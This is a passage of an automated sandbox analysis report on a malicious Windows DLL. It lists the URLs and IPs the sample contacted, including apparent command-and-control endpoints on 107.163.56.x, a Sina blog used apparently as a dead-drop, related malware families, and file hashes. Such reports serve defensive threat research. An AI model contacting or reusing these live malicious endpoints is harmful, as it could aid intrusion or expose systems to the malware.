http://107.163.56.232:18963/main.php) | rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://beacon.sina.com.cn/a.gif?noScript | rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093OW64 | rundll32.exe, 00000004.00000002.3147049730.0000000006530000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.php% | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpW5 | rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.php$_ | rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093j | rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.php7 | rundll32.exe, 00000004.00000003.2474378153.000000000656C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/s | rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.php3 | rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093s | rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56I | rundll32.exe, 00000004.00000002.3146487020.0000000005FED000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093j | rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpP | rundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419918524.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://upx.sf.net | Amcache.hve.14.dr | false | | high
http://107.163.56.232:18963/main.phpI | rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpE | rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpF | rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpA | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/4. | rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.php_ | rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/user | rundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093M | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpC: | rundll32.exe, 00000004.00000002.3146735583.000000000628A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3146573210.000000000606D000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093I | rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://blog.sina.com.cn/S | rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://blog.sina.com.cn/u/57624790935b-56076a3fa776.xml1 | rundll32.exe, 00000004.00000003.2250309348.000000000342E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpU | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpS | rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/5762479093R | rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093P | rundll32.exe, 00000004.00000003.2353062409.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2298221763.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.231:1530//joy.asp?sid=rungnejcndvgnJgFe5vteX8v29 | rundll32.exe, 00000004.00000002.3141638484.0000000002FAC000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093K | rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://blog.sina.com.cn/k | rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpk | rundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/u/5762479093P | rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://107.163.56.232:18963/main.phpj | rundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://107.163.56.232:18963/main.phpg | rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://blog.sina.com.cn/u/%so | rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093F | rundll32.exe, 00000004.00000003.2639468391.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640231182.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2129869017.0000000003454000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/5762479093G | rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://blog.sina.com.cn/u/%ss | rundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://blog.sina.com.cn/ | rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419824510.0000000006569000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://portrait6.sinaimg.cn/5762479093/blog/180 | rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880865322.0000000005165000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://blog.sina.com.cn/a | rundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
107.163.56.232 | unknown | United States | 20248 | TAKE2US | true
116.133.8.92 | blogx.sina.com.cn | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | false
107.163.56.231 | unknown | United States | 20248 | TAKE2US | true
107.163.56.110 | unknown | United States | 20248 | TAKE2US | true
107.163.56.251 | unknown | United States | 20248 | TAKE2US | true
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578341
Start date and time: 2024-12-19 15:42:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 2JSGOlbNym.dll (renamed because original name is a hash value)
Original Sample Name: bc3a8653c59edabf91eb545f7d9dcf818f3ef003.dll
Detection: MAL
Classification: mal100.troj.spyw.evad.winDLL@42/12@1/6
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 37
• Number of non-executed functions: 67
Cookbook Comments:
• Found application associated with file extension: .dll
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.189.173.22, 23.193.114.18, 23.193.114.26, 20.190.147.11, 20.109.210.53
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: 2JSGOlbNym.dll
Time | Type | Description
09:44:09 | API Interceptor | 1509473x Sleep call for process: rundll32.exe modified
09:44:16 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
09:44:44 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
107.163.56.232 | 02hNixBIvP.exe | malicious | Unknown | -
107.163.56.232 | abc.dll | malicious | Unknown | -
116.133.8.92 | 4hSuRTwnWJ.dll | malicious | Unknown | blog.sina.com.cn/u/5762479093
116.133.8.92 | QCTYoyX422.dll | malicious | Unknown | blog.sina.com.cn/u/5762479093
107.163.56.231 | 02hNixBIvP.exe | malicious | Unknown | -
107.163.56.231 | abc.dll | malicious | Unknown | -
107.163.56.110 | 4hSuRTwnWJ.dll | malicious | Unknown | 107.163.56.110:18530/u1129.html
107.163.56.110 | QCTYoyX422.dll | malicious | Unknown | 107.163.56.110:18530/u1129.html
107.163.56.251 | 4hSuRTwnWJ.dll | malicious | Unknown | -
107.163.56.251 | yKVQVNB2qI.dll | malicious | Unknown | -
107.163.56.251 | oQy3XhO4cX.dll | malicious | Unknown | -
107.163.56.251 | gmqIbj35WF.dll | malicious | Unknown | -
107.163.56.251 | Bcr1Wl2Jn0.dll | malicious | Unknown | -
107.163.56.251 | OL50O9ho5M.dll | malicious | Unknown | -
107.163.56.251 | 02hNixBIvP.exe | malicious | Unknown | -
107.163.56.251 | abc.dll | malicious | Unknown | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
blogx.sina.com.cn | 4hSuRTwnWJ.dll | malicious | Unknown | 116.133.8.92
blogx.sina.com.cn | QCTYoyX422.dll | malicious | Unknown | 116.133.8.92
blogx.sina.com.cn | peks66Iy06.exe | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | XXHYneydvF.exe | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | nt11qTrX4f.exe | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | otsIBG7J9b.exe | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | XgijTrY6No.exe | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | 08e2VwqyI0.dll | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | PqZ6GU98Eh.dll | malicious | Unknown | 202.108.0.52
blogx.sina.com.cn | jYAKmjIPgI.dll | malicious | Unknown | 202.108.0.52
bg.microsoft.map.fastly.net | 4hSuRTwnWJ.dll | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | I3FtIOCni3.dll | malicious | GhostRat | 199.232.214.172
bg.microsoft.map.fastly.net | 26B1sczZ88.dll | malicious | Virut | 199.232.210.172
bg.microsoft.map.fastly.net | UV0zBp62hW.dll | malicious | Virut | 199.232.210.172
bg.microsoft.map.fastly.net | Gioia Faggioli-End Of Year-Bonus.docx | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdf | malicious | PDFPhish | 199.232.214.172
bg.microsoft.map.fastly.net | jhsdgfjkh236.bat | malicious | Abobus Obfuscator, Braodo | 199.232.214.172
bg.microsoft.map.fastly.net | RECOUVREMENT -FACTURER1184521.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS | 199.232.214.172
bg.microsoft.map.fastly.net | LbtytfWpvx.vbs | malicious | Remcos | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | 4hSuRTwnWJ.dll | malicious | Unknown | 116.133.8.92
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | x86_64.nn.elf | malicious | Mirai, Okiru | 218.25.216.71
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | QCTYoyX422.dll | malicious | Unknown | 116.133.8.92
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | x86_32.nn.elf | malicious | Mirai, Okiru | 116.162.244.198
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | sh4.nn.elf | malicious | Mirai, Okiru | 110.230.131.214
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | arm.nn.elf | malicious | Mirai, Okiru | 124.133.226.227
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | arm7.nn.elf | malicious | Mirai, Okiru | 112.85.190.34
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | x86_32.nn.elf | malicious | Mirai, Okiru | 218.28.241.0
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | mips.nn.elf | malicious | Mirai, Okiru | 112.247.180.189
CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | sparc.nn.elf | malicious | Mirai, Okiru | 42.179.207.24
TAKE2US | 4hSuRTwnWJ.dll | malicious | Unknown | 107.163.56.251
TAKE2US | QCTYoyX422.dll | malicious | Unknown | 107.163.56.110
TAKE2US | peks66Iy06.exe | malicious | Unknown | 107.163.241.232
TAKE2US | XXHYneydvF.exe | malicious | Unknown | 107.163.241.204
TAKE2US | nt11qTrX4f.exe | malicious | Unknown | 107.163.241.232
TAKE2US | otsIBG7J9b.exe | malicious | Unknown | 107.163.241.232
TAKE2US | XgijTrY6No.exe | malicious | Unknown | 107.163.241.204
TAKE2US | 08e2VwqyI0.dll | malicious | Unknown | 107.163.56.110
TAKE2US | PqZ6GU98Eh.dll | malicious | Unknown | 107.163.56.110
TAKE2US | jYAKmjIPgI.dll | malicious | Unknown |
                                                                                                                                                                        • 107.163.56.110
Match                             Associated Sample Name / URL                    Detection  Threat Name               Context
37f463bf4616ecd445d4a1937da06e19  4hSuRTwnWJ.dll                                  malicious  Unknown                   116.133.8.92
                                  QCTYoyX422.dll                                  malicious  Unknown                   116.133.8.92
                                  PURCHASE ORDER TRC-090971819130-24_pdf.exe      malicious  GuLoader, MassLogger RAT  116.133.8.92
                                  PAYMENT ADVICE 750013-1012449943-81347-pdf.exe  malicious  GuLoader, MassLogger RAT  116.133.8.92
                                  INVOICE-0098.pdf ... .lnk.lnk.d.lnk             malicious  Unknown                   116.133.8.92
                                  YinLHGpoX4.vbs                                  malicious  GuLoader, RHADAMANTHYS    116.133.8.92
                                  F8HYX5HOgA.vbs                                  malicious  GuLoader, RHADAMANTHYS    116.133.8.92
                                  0iTxQouy7k.vbs                                  malicious  GuLoader, RHADAMANTHYS    116.133.8.92
                                  tmkSAOF3GM.vbs                                  malicious  GuLoader, RHADAMANTHYS    116.133.8.92
                                  t5lpvahkgypd7wy.vbs                             malicious  GuLoader, RHADAMANTHYS    116.133.8.92

No context

Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: modified
Size (bytes): 705
Entropy (8bit): 4.955986925542614
Encrypted: false
SSDEEP: 12:8DKH+vSE3epENs4KcGmfQ+n7BR7BR7BR7BR7BR7BR7BR7BR7BA:8DKH+vSaeENs4+mfQ+nPPPPPPPPe
MD5: DFE61BB0D430B43C78BB3419DB9B8D8F
SHA1: 6295EF17BE3B2B74BB898B90304F190257024558
SHA-256: B958276D9E19D38BD659B360297BCF17CF450470180F7FE37DC340184E9F0A78
SHA-512: 92C8EC39407AA396191C6F1AFD7CACC1B18DD36AB02C7089F98AA218E942F95557348A7030983F92D06F4796E9AFB7BB632FE993FCC80A23EE2E648C9A3E7839
Malicious: false
Preview: ..2024-12-21 22:47..iOffset....2024-12-22 17:35..iOffset....2024-12-23 13:48..iOffset....2024-12-25 07:59..iOffset....2024-12-27 04:45..iOffset....2024-12-28 05:38..iOffset....2024-12-29 07:51..iOffset....2024-12-30 12:29..iOffset....2025-01-02 21:55..iOffset....2025-01-05 07:03..iOffset....2025-01-12 18:44..iOffset....2025-01-23 19:00..iOffset....2025-01-28 23:33..iOffset....2028-03-16 00:51..iOffset....2037-10-12 23:29..iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset..

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9509604707388567
Encrypted: false
SSDEEP: 192:V8riROTD30BU/wjeTNW6ZYzuiFeZ24IO8dci:gio3EBU/wje57YzuiFeY4IO8dci
MD5: 9F329C0C19BF17BDE10EB684F0A3A9D2
SHA1: 56430D514C128A5CF6B941C6E59BD368F1FB03E0
SHA-256: BA84140DEE82597C6F5625352BFB1FC425FFB183017A64BCE4E7E3CE9E8930DA
SHA-512: E5E817CA1EBAE3FFA0B24D1C1D2BB4236DA0AC8A959D4C6BE3E73348A0C0F5FBB0EAF66A6FBD4378791729721408A66C8FFF0D1B025C20AA404AA14F38E70F35
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.3.6.9.3.4.8.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.4.0.5.2.8.6.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.4.1.c.3.2.7.-.8.4.6.0.-.4.f.3.e.-.a.8.e.6.-.d.c.1.b.0.5.c.b.e.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.3.e.0.f.3.5.-.4.5.3.9.-.4.8.8.d.-.8.2.4.8.-.e.4.0.2.f.b.c.8.4.0.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.4.-.0.0.0.1.-.0.0.1.3.-.b.1.f.c.-.8.f.7.8.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9505525066818328
Encrypted: false
SSDEEP: 192:crfiOxiOBv0BU/wjeTtW6ZYzuiFeZ24IO8dci:YfiOlBcBU/wjeZ7YzuiFeY4IO8dci
MD5: 634BD457BCA0C5CCA23D47B314734EDD
SHA1: 0CC7F75E4648E162E7D4CA95AE75F647509A682F
SHA-256: 09DEA282FC0BCE1372178604AB7B8B9CF1692384C6180DD9D90381521116ED4B
SHA-512: A66B9F949BD5E099EC491C8A1CAFCDEF350463BFD6DEE2F939079C583BB58C6DDB5DF9CC38E2C81872C6238245FDCBA2BF1035437D1382DD7EA9A961010A6470
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.7.0.1.6.1.9.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.7.7.3.4.9.3.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.c.5.f.c.6.5.-.7.7.2.3.-.4.f.0.8.-.9.6.e.e.-.3.0.4.c.a.e.e.d.b.c.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.b.4.4.9.2.c.-.c.e.4.e.-.4.d.e.1.-.a.8.f.3.-.3.0.d.4.6.5.9.b.8.c.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.9.4.-.0.0.0.1.-.0.0.1.3.-.f.d.e.5.-.6.5.7.a.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5